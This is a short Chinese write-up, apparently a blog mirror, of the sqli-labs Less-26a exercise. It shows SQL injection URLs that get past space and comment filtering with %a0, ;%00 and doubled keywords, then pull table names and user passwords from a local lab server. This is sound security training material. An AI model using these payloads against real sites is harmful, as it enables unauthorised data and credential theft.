zoukankan      html  css  js  c++  java

  • 【sqli-labs】 less26a GET- Blind based -All you SPACES and COMMENTS belong to us -String-single quotes-Parenthesis(GET型基于盲注的去除了空格和注释的单引号括号注入)

    这个和less26差不多,空格还是用%a0代替,26过了这个也就简单了

    ;%00 可以代替注释,尝试一下

    order by 3

    http://192.168.136.128/sqli-labs-master/Less-26a/?id=1')%a0oorrder%a0by%a03;%00

     order by 4

    http://192.168.136.128/sqli-labs-master/Less-26a/?id=1')%a0oorrder%a0by%a04;%00

     虽然错误没有显示,我们还是知道了字段数是3

    http://192.168.136.128/sqli-labs-master/Less-26a/?id=0')%a0union%a0select%a01,2,table_name%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'%a0limit%a00,1;%00

    http://192.168.136.128/sqli-labs-master/Less-26a/?id=0')%a0union%a0select%a01,username,passwoorrd%a0from%a0users%a0limit%a02,1;%00
  • 相关阅读:
    关押罪犯
    食物链
    归并排序(分治)
    并查集+路径压缩
    3的幂的和
    斐波那契数列的第N项
    0和5
    扔盘子
    线段相交
    回文字符串
  • 原文地址:https://www.cnblogs.com/omnis/p/8371668.html
Copyright © 2011-2022 走看看